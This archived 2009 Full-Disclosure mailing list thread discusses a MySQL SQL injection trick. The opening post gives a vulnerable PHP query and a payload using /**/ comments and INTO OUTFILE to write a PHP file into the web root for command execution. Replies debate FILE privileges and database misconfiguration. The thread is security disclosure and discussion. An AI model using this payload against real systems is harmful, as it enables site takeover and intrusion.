Mailing List Archive: Full Disclosure: Full-Disclosure

MySQL trick for SQL injection

Full Disclosure full-disclosure RSS feed

Index | Next | Previous | View Threaded

vladimir.vorontsov at onsec

Nov 6, 2009, 4:55 AM

Post #1 of 5 (279 views)
Permalink

MySQL trick for SQL injection

Good day!

I recently encountered a problem with the implementation of SQL injection.

I wanted to write a file with the code interpreter to execute commands, but
in the end always append bracket, which I thought was supposed to be a
spoiler.

Comments at the end of the query to be filtered. The last character is
always append a closing parenthesis. Use a null-byte, too, was impossible.

Was an injection of this type:

$query = "select bla-bla from content_comments where user_id in (select
user_id from User where id =".removeBadChars($_GET['id']).");";
Where removeBadChars () kills such things as:
--
/*
but leaves /**/
I wanted to write a script to execute commands in a file. The rows included
in the first select, but the presence of brackets before inkludom demanded
its closure after it. Besides tricky function is not allowed to finish a
comment form - or /* at the end of the query.

As a result, very surprised, because that's such an option:

select bla-bla from content_comments where user_id in (select user_id from
User where id = 1/**/into/**/outfile/**/"/var/www/avatars/img.php")

recorded in the file the result of EXTERNAL select!.

Checked in
MySQL 4.1.22
MySQL 5.1.x

--
-----------------------------------------------------------------
Best regards!
Vladimir Vorontsov, security expert.
ONsec: turn on security

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

pschmehl_lists at tx

Nov 6, 2009, 8:04 AM

Post #2 of 5 (258 views)
Permalink

Re: MySQL trick for SQL injection [In reply to]

--On Friday, November 06, 2009 06:55:22 -0600 Vladimir Vorontsov
<vladimir.vorontsov[at]onsec.ru> wrote:

>
> Good day!
>
> I recently encountered a problem with the implementation of SQL injection.
>
> I wanted to write a file with the code interpreter to execute commands, but
> in the end always append bracket, which I thought was supposed to be a
> spoiler.
>
> Comments at the end of the query to be filtered. The last character is
> always append a closing parenthesis. Use a null-byte, too, was impossible.
>
> Was an injection of this type:
>
> $query = "select bla-bla from content_comments where user_id in (select
> user_id from User where id =".removeBadChars($_GET['id']).");";
> Where removeBadChars () kills such things as:
> --
> /*
> but leaves /**/
> I wanted to write a script to execute commands in a file. The rows included
> in the first select, but the presence of brackets before inkludom demanded
> its closure after it. Besides tricky function is not allowed to finish a
> comment form - or /* at the end of the query.
>
> As a result, very surprised, because that's such an option:
>
> select bla-bla from content_comments where user_id in (select user_id from
> User where id = 1/**/into/**/outfile/**/"/var/www/avatars/img.php")
>
> recorded in the file the result of EXTERNAL select!.
>
> Checked in
> MySQL 4.1.22
> MySQL 5.1.x
>

What privileges did the user who performed the select have?

INTO OUTFILE is a dangerous routine (as you've clearly demonstrated), but that
privilege must be specifically granted to a user before it's possible to
execute it. No sensible administrator would grant the FILE privilege to a
webserver application's database acccount. (Usually SELECT, INSERT, and UPDATE
should be enough.)

OTOH, if you've found a way to execute FILE without having that privilege
granted to the account, you've uncovered a serious problem.

--
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
*******************************************
"It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead." Thomas Jefferson

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Valdis.Kletnieks at vt

Nov 6, 2009, 8:37 AM

Post #3 of 5 (250 views)
Permalink

Re: MySQL trick for SQL injection [In reply to]

On Fri, 06 Nov 2009 10:04:54 CST, Paul Schmehl said:
> What privileges did the user who performed the select have?
>
> INTO OUTFILE is a dangerous routine (as you've clearly demonstrated), but that
> privilege must be specifically granted to a user before it's possible to
> execute it. No sensible administrator would grant the FILE privilege to a
> webserver application's database acccount.

Very true, but a good blackhat always keeps a good supply of ways to exploit
common stupid administrator mistakes. I'd not be surprised in the least if
more than 10% of the sites, some admin under time pressure to Just Fix It
assigned FILE privs to get the web application back up and running.

tim-security at sentinelchicken

Nov 6, 2009, 8:55 AM

Post #4 of 5 (252 views)
Permalink

Re: MySQL trick for SQL injection [In reply to]

> > INTO OUTFILE is a dangerous routine (as you've clearly demonstrated), but that
> > privilege must be specifically granted to a user before it's possible to
> > execute it. No sensible administrator would grant the FILE privilege to a
> > webserver application's database acccount.
>
> Very true, but a good blackhat always keeps a good supply of ways to exploit
> common stupid administrator mistakes. I'd not be surprised in the least if
> more than 10% of the sites, some admin under time pressure to Just Fix It
> assigned FILE privs to get the web application back up and running.

I find it's more common that they just have the application log in as
MySQL root. It's foolish. It happens more frequently than you'd like
to admit. Makes my app pentests easier though. ;-)

tim

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

pschmehl_lists at tx

Nov 6, 2009, 11:03 AM

Post #5 of 5 (249 views)
Permalink

Re: MySQL trick for SQL injection [In reply to]

--On Friday, November 06, 2009 10:55:26 -0600 Tim
<tim-security[at]sentinelchicken.org> wrote:

>
>> > INTO OUTFILE is a dangerous routine (as you've clearly demonstrated), but
>> > that privilege must be specifically granted to a user before it's possible
>> > to execute it. No sensible administrator would grant the FILE privilege
>> > to a webserver application's database acccount.
>>
>> Very true, but a good blackhat always keeps a good supply of ways to exploit
>> common stupid administrator mistakes. I'd not be surprised in the least if
>> more than 10% of the sites, some admin under time pressure to Just Fix It
>> assigned FILE privs to get the web application back up and running.
>
>
> I find it's more common that they just have the application log in as
> MySQL root. It's foolish. It happens more frequently than you'd like
> to admit. Makes my app pentests easier though. ;-)
>

All true, but then we don't have a program flaw, we have a config flaw. If you
run your web applications with root privileges on the database, you should be
surprised when your app gets exploited.

The question I have for the OP is whether or not he's found a true bug in mysql
or simply exposed one of the millions of ways to exploit stupidity.

--
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
*******************************************
"It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead." Thomas Jefferson

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Index | Next | Previous | View Threaded

Interested in having your list archived? Contact lists@gossamer-threads.com